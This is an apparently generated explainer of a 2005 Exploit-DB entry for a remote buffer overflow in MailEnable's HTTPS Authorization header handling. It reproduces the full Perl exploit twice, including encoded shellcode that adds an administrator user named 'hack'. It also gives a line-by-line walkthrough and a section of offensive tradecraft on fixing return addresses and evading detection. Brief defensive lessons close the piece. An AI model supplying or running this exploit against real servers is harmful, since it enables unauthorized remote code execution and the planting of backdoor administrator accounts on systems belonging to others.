MailEnable HTTPS Remote Buffer Overflow Explained

What this paper is

This paper details a remote buffer overflow vulnerability in MailEnable Enterprise and Professional versions. The vulnerability allows an attacker to remotely execute arbitrary code on the target server by sending a specially crafted HTTP GET request. The exploit provided aims to create a new administrator user on the compromised system.

Simple technical breakdown

The vulnerability lies in how MailEnable's HTTPS service handles the Authorization header. When a long, malformed Authorization header is sent, it overflows a buffer on the server. This overflow overwrites critical memory, including the return address on the stack. The exploit crafts a payload that includes:

1. No Operation (NOP) sled: A series of NOP instructions to ensure execution lands within the shellcode.
2. Shellcode: The actual malicious code to be executed. In this case, it's designed to create a new user with administrator privileges.
3. Return Address: A pointer to the shellcode, which overwrites the original return address on the stack.

When the vulnerable function returns, it jumps to the attacker-controlled return address, executing the shellcode.

Complete code and payload walkthrough

The provided Perl script utilizes the IO::Socket module to establish a network connection and send the exploit payload.

#!/usr/bin/perl
# This tools and to consider only himself to educational purpose
#
#
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[                                                               ]=-
#-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:\Documents and Settings\Administrator\Desktop\prova bof\mailenable-bug+exploit
#>net users
#
#Account utente per \\SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__          Administrator            ASPNET
#Guest                    hack                     IME_ADMIN
#IME_USER                 IUSR_SERVER              IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck

use IO::Socket;
$ret = "\x6c\x36\xb7"; #RET For Win2003
$nop = "\x90"x24;
#win32_adduser -  PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc7".
"\x7e\x10\xf5\x83\xeb\xfc\xe2\xf4\x3b\x96\x56\xf5\xc7\x7e\x9b\xb0".
"\xfb\xf5\x6c\xf0\xbf\x7f\xff\x7e\x88\x66\x9b\xaa\xe7\x7f\xfb\x16".
"\xe9\x37\x9b\xc1\x4c\x7f\xfe\xc4\x07\xe7\xbc\x71\x07\x0a\x17\x34".
"\x0d\x73\x11\x37\x2c\x8a\x2b\xa1\xe3\x7a\x65\x16\x4c\x21\x34\xf4".
"\x2c\x18\x9b\xf9\x8c\xf5\x4f\xe9\xc6\x95\x9b\xe9\x4c\x7f\xfb\x7c".
"\x9b\x5a\x14\x36\xf6\xbe\x74\x7e\x87\x4e\x95\x35\xbf\x71\x9b\xb5".
"\xcb\xf5\x60\xe9\x6a\xf5\x78\xfd\x2e\x75\x10\xf5\xc7\xf5\x50\xc1".
"\xc2\x02\x10\xf5\xc7\xf5\x78\xc9\x98\x4f\xe6\x95\x91\x95\x1d\x9d".
"\x28\xb0\xf0\x95\xaf\xe6\xee\x7f\xc9\x29\xef\x12\x2f\x90\xef\x0a".
"\x38\x1d\x7d\x91\xe9\x1b\x68\x90\xe7\x51\x73\xd5\xa9\x1b\x64\xd5".
"\xb2\x0d\x75\x87\xe7\x16\x71\x96\xac\x5e\x78\x94\xa4\x15\x30\xda".
"\x86\x3a\x54\xd5\xe1\x58\x30\x9b\xa2\x0a\x30\x99\xa8\x1d\x71\x99".
"\xa0\x0c\x7f\x80\xb7\x5e\x51\x91\xaa\x17\x7e\x9c\xb4\x0a\x62\x94".
"\xb3\x11\x62\x86\xe7\x16\x71\x96\xac\x5e\x3f\xb4\x83\x3a\x10\xf5";

use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-\n";
print STDERR "-=[                                                               ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-\n\n";

if (!defined($host)) {
Usage();
}

$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0\r\n";
$ric2 = "Authorization: $bof\r\n\r\n";
$richiesta = $ric.$ric2;
print "[+]Connecting to $host\n";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+]Sending Evil Request\n";
                                sleep 2;
                                print $socket "$richiesta";
                                print "[+]Creating Administrator User\n";
                                print "Connect to $host Using User (hack) Pass (hack)\n";


close;

sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}

# milw0rm.com [2005-04-25]

Code Fragment/Block -> Practical Purpose

• #!/usr/bin/perl: Shebang line, indicating the script should be executed with Perl.
• use IO::Socket;: Imports the IO::Socket module, which provides functions for network socket programming.
• $ret = "\x6c\x36\xb7";: Defines the return address. This specific sequence of bytes (\x6c\x36\xb7) is a hardcoded address that, when used as the return address, points to the beginning of the shellcode on a Windows 2003 system. This address is crucial for hijacking the program's execution flow.
• $nop = "\x90"x24;: Defines a NOP sled. \x90 is the opcode for a "No Operation" instruction. Repeating it 24 times creates a buffer of NOP instructions. This increases the chances that the program counter will eventually land on the actual shellcode, even if the exact return address is slightly off due to memory layout variations.
• my $shellcode = "...": This is the core payload. It's a sequence of bytes representing machine code. The comment #win32_adduser - PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com provides a strong hint about its origin and function. It's likely generated by a tool like Metasploit's msfvenom (or its predecessors) and is designed to:
  • Create a new user named "hack".
  • Set the password for this user to "hack".
  • Grant this user administrator privileges.
  • EXITFUNC=thread indicates how the shellcode should terminate its execution.
  • Size=240 is the approximate size of the shellcode.
  • Encoder=PexFnstenvSub refers to a specific encoding technique used to evade simple signature-based detection.
• use Getopt::Std; getopts('h:', \%args);: This part handles command-line arguments. It expects an option -h followed by a hostname. The parsed arguments are stored in the %args hash.
• if (defined($args{'h'})) { $host = $args{'h'}; }: If the -h argument was provided, the hostname is stored in the $host variable.
• print STDERR ...: These lines print informational messages to the standard error stream, displaying the exploit's name, author, and contact information.
• if (!defined($host)) { Usage(); }: Checks if a target host was provided. If not, it calls the Usage subroutine to print help information and exits.
• $bof = $nop.$shellcode.$ret;: This line constructs the buffer overflow payload. It concatenates the NOP sled, the shellcode, and the return address. This entire string will be sent as part of the Authorization header.
• $ric = "GET / HTTP/1.0\r\n";: Defines the start of the HTTP request, requesting the root path (/) using HTTP/1.0.
• $ric2 = "Authorization: $bof\r\n\r\n";: This is the critical part that triggers the vulnerability. It crafts the Authorization header, injecting the $bof payload (NOPs, shellcode, return address) directly into it. The double \r\n signifies the end of the HTTP headers.
• $richiesta = $ric.$ric2;: Combines the request line and the crafted Authorization header into the complete HTTP request.
• print "[+]Connecting to $host\n";: Informs the user that the script is attempting to connect.
• sleep 2;: Pauses execution for 2 seconds, likely for visual feedback or to avoid overwhelming the target.
• $socket = new IO::Socket::INET (...): Creates a new TCP socket connection to the target host ($host) on port 8080 (the default HTTPS port for MailEnable, though often 443 is used for standard HTTPS). die unless $socket; will terminate the script if the connection fails.
• print "[+]Sending Evil Request\n";: Informs the user that the malicious request is about to be sent.
• sleep 2;: Another pause.
• print $socket "$richiesta";: Sends the crafted HTTP request containing the buffer overflow payload over the established socket connection.
• print "[+]Creating Administrator User\n";: Indicates that the exploit has been sent and the shellcode is expected to execute.
• print "Connect to $host Using User (hack) Pass (hack)\n";: Informs the user about the credentials of the newly created administrator user.
• close;: Closes the socket connection.
• sub Usage { ... }: A subroutine that prints usage instructions to the user if the -h argument is missing.

Shellcode Breakdown (Conceptual - exact disassembly requires a debugger/disassembler):

The shellcode is a complex sequence of bytes. Based on the comment, it's a win32_adduser payload. Such payloads typically perform the following actions:

1. Initialization: Sets up registers and stack.
2. API Resolution: Finds the addresses of necessary Windows API functions (e.g., CreateUser, AddUserToGroup, NetApi32.dll). This is often done by iterating through loaded modules and their export tables, or by using specific techniques like LoadLibrary and GetProcAddress.
3. User Creation: Calls the appropriate API function to create a new user account with the specified username ("hack").
4. Password Setting: Sets the password for the newly created user ("hack").
5. Group Membership: Adds the new user to the "Administrators" group.
6. Termination: Exits gracefully, often using ExitThread or similar functions.

The specific bytes in $shellcode are the machine code instructions that perform these steps. The \x90 (NOP) instructions preceding it act as a landing pad, and $ret (\x6c\x36\xb7) is the address the program will jump to after the vulnerable function returns, which should point into the NOP sled or the shellcode itself.

Practical details for offensive operations teams

• Required Access Level: Network access to the target host is required. No local access or prior authentication is needed for this specific vulnerability.
• Lab Preconditions:
  • A vulnerable MailEnable Enterprise or Professional server must be running and accessible over the network on port 8080 (or the configured HTTPS port).
  • The server should be running a compatible Windows operating system (likely Windows 2000 or Windows Server 2003, given the exploit's age and the $ret address).
  • A Perl interpreter must be available on the attacker's machine to run the exploit script.
• Tooling Assumptions:
  • Perl interpreter with IO::Socket and Getopt::Std modules.
  • Network connectivity to the target.
  • A way to verify the user creation (e.g., net users command on the target if remote command execution is possible, or by attempting to log in with the new credentials).
• Execution Pitfalls:
  • Port Mismatch: The exploit targets port 8080. If MailEnable is configured to use a different HTTPS port (e.g., 443), the script will need modification.
  • Return Address Mismatch: The $ret address (\x6c\x36\xb7) is hardcoded for a specific OS and MailEnable version. If the target system has a different OS version, patch level, or MailEnable version, this address might be incorrect, leading to a crash instead of shellcode execution. The NOP sled helps, but a completely wrong return address will fail.
  • ASLR/DEP: Modern operating systems employ Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). These protections, if enabled and effective on the target OS, would make this specific exploit (especially the hardcoded return address) significantly harder or impossible to execute without further techniques (like ROP chains or shellcode that bypasses DEP). This exploit predates widespread ASLR/DEP adoption.
  • Firewalls: Network firewalls could block traffic to port 8080.
  • IDS/IPS: Intrusion Detection/Prevention Systems might detect the malformed HTTP request or the shellcode signature.
  • Shellcode Size/Buffer Size: The exploit relies on the Authorization header being long enough to cause the overflow. If the vulnerable buffer is smaller than expected, or if the server sanitizes the header length, the exploit might fail.
  • Shellcode Failure: The shellcode itself might fail to execute correctly due to environmental factors or incorrect API resolution.
• Tradecraft Considerations:
  • Reconnaissance: Confirm the MailEnable version and running services. Identify the HTTPS port.
  • Payload Customization: If the hardcoded return address fails, it would need to be identified for the specific target environment. This often involves debugging or using tools like pattern_create and pattern_offset in Metasploit.
  • Stealth: The exploit's HTTP request is somewhat unusual. Network monitoring might flag it. The use of a NOP sled and an encoder for the shellcode are attempts to evade basic detection.
  • Post-Exploitation: After successfully creating the user, the operator would need to establish a more persistent or interactive shell, as this exploit only creates a user account.

Where this was used and when

This exploit was published in April 2005. At that time, MailEnable was a popular mail server solution. Exploits of this nature were common in the mid-2000s, targeting vulnerabilities in network services. Given its publication date, it's likely this vulnerability was exploited in the wild shortly after its discovery, targeting organizations using MailEnable Enterprise or Professional versions on Windows 2000 or Windows Server 2003. The inclusion of a net users output in the comments suggests the author tested it on a Windows XP/2003 system.

Defensive lessons for modern teams

• Patch Management: This exploit targets a known vulnerability. Keeping all software, especially network-facing services like mail servers, updated with the latest security patches is paramount.
• Input Validation: Developers must rigorously validate all input, especially data received over the network. Unexpectedly long or malformed inputs should be handled gracefully without causing buffer overflows.
• Secure Coding Practices: Employing secure coding practices, using memory-safe languages where possible, and utilizing static/dynamic analysis tools can help prevent such vulnerabilities.
• Network Segmentation: Isolating critical servers and limiting direct external access can reduce the attack surface.
• Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS solutions can detect and block malformed HTTP requests or known exploit patterns.
• Endpoint Detection and Response (EDR): EDR solutions can detect suspicious process behavior, such as unexpected user creation or execution of shellcode, even if the initial network exploit bypasses perimeter defenses.
• Modern OS Protections: Features like ASLR and DEP, when enabled and properly configured, significantly hinder the effectiveness of classic buffer overflow exploits that rely on predictable memory addresses.

ASCII visual (if applicable)

+-----------------+      +-----------------------+      +-------------------+
| Attacker Machine|----->| MailEnable Server     |<-----| Network Services  |
| (Perl Exploit)  |      | (Vulnerable Service)  |      | (e.g., HTTP/S)    |
+-----------------+      +-----------------------+      +-------------------+
        |                        |
        | 1. Send Malformed      | 2. Buffer Overflow
        |    HTTP Request        |    Occurs
        |    (Authorization:     |
        |     NOPs + Shellcode  |
        |     + Return Address) |
        |                        | 3. Return Address
        |                        |    Hijacked
        |                        |
        |                        | 4. Shellcode Executes
        |                        |    (Creates Admin User)
        |                        |
        +------------------------+

This diagram illustrates the flow of the exploit: the attacker sends a crafted request, which causes a buffer overflow on the MailEnable server. This overflow overwrites the return address, redirecting execution to the attacker's shellcode, which then performs its malicious action (creating an administrator user).

Source references

• Paper ID: 952
• Paper Title: MailEnable Enterprise & Professional - HTTPS Remote Buffer Overflow
• Author: CorryL
• Published: 2005-04-25
• Keywords: Windows, remote
• Paper URL: https://www.exploit-db.com/papers/952
• Raw Exploit URL: https://www.exploit-db.com/raw/952

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
# This tools and to consider only himself to educational purpose
#
# 
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[                                                               ]=-
#-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:\Documents and Settings\Administrator\Desktop\prova bof\mailenable-bug+exploit
#>net users
#
#Account utente per \\SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__          Administrator            ASPNET
#Guest                    hack                     IME_ADMIN
#IME_USER                 IUSR_SERVER              IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck


use IO::Socket; 
$ret = "\x6c\x36\xb7"; #RET For Win2003
$nop = "\x90"x24;
#win32_adduser -  PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc7".
"\x7e\x10\xf5\x83\xeb\xfc\xe2\xf4\x3b\x96\x56\xf5\xc7\x7e\x9b\xb0".
"\xfb\xf5\x6c\xf0\xbf\x7f\xff\x7e\x88\x66\x9b\xaa\xe7\x7f\xfb\x16".
"\xe9\x37\x9b\xc1\x4c\x7f\xfe\xc4\x07\xe7\xbc\x71\x07\x0a\x17\x34".
"\x0d\x73\x11\x37\x2c\x8a\x2b\xa1\xe3\x7a\x65\x16\x4c\x21\x34\xf4".
"\x2c\x18\x9b\xf9\x8c\xf5\x4f\xe9\xc6\x95\x9b\xe9\x4c\x7f\xfb\x7c".
"\x9b\x5a\x14\x36\xf6\xbe\x74\x7e\x87\x4e\x95\x35\xbf\x71\x9b\xb5".
"\xcb\xf5\x60\xe9\x6a\xf5\x78\xfd\x2e\x75\x10\xf5\xc7\xf5\x50\xc1".
"\xc2\x02\x10\xf5\xc7\xf5\x78\xc9\x98\x4f\xe6\x95\x91\x95\x1d\x9d".
"\x28\xb0\xf0\x95\xaf\xe6\xee\x7f\xc9\x29\xef\x12\x2f\x90\xef\x0a".
"\x38\x1d\x7d\x91\xe9\x1b\x68\x90\xe7\x51\x73\xd5\xa9\x1b\x64\xd5".
"\xb2\x0d\x75\x87\xe7\x16\x71\x96\xac\x5e\x78\x94\xa4\x15\x30\xda".
"\x86\x3a\x54\xd5\xe1\x58\x30\x9b\xa2\x0a\x30\x99\xa8\x1d\x71\x99".
"\xa0\x0c\x7f\x80\xb7\x5e\x51\x91\xaa\x17\x7e\x9c\xb4\x0a\x62\x94".
"\xb3\x11\x62\x86\xe7\x16\x71\x96\xac\x5e\x3f\xb4\x83\x3a\x10\xf5";

use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-\n";
print STDERR "-=[                                                               ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-\n\n";

if (!defined($host)) {
Usage();
}

$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0\r\n";
$ric2 = "Authorization: $bof\r\n\r\n";
$richiesta = $ric.$ric2;
print "[+]Connecting to $host\n";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+]Sending Evil Request\n";
                                sleep 2;
                                print $socket "$richiesta";
                                print "[+]Creating Administrator User\n";
                                print "Connect to $host Using User (hack) Pass (hack)\n";
                                
                               
close;

sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}

# milw0rm.com [2005-04-25]